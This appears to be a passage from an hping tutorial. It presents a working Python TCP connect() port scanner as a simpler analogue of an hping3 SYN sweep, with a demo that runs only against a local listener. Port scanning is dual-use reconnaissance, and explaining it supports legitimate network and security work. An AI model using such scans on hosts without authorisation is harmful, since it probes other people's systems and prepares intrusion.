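For comparison, the same incrementing-port idea can be sketched as an ordinary connect() scan in Python. This is only an illustrative analogue: it completes full TCP handshakes rather than sending hping's half-open SYN probes, so it is slower and noisier, but it needs no raw sockets or root. Hosts and ports below are placeholders.

```python
import socket

def connect_scan(host, ports, timeout=0.5):
    """Try a full TCP connect() to each port in turn; return those that accept.

    A plain-connect analogue of an hping SYN sweep (hping3 -S -p ++1 host):
    an accepted connection here corresponds to a SYN/ACK in hping's output.
    """
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass  # refused, timed out, or filtered - treat as closed
    return open_ports

if __name__ == "__main__":
    # Self-contained demo against a throwaway local listener.
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    print(connect_scan("127.0.0.1", [port]))
    srv.close()
```

For real scanning work a dedicated tool such as nmap (or hping itself) is the better choice; the sketch just shows the mechanism.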

More reading is available here http://wiki.hping.org/33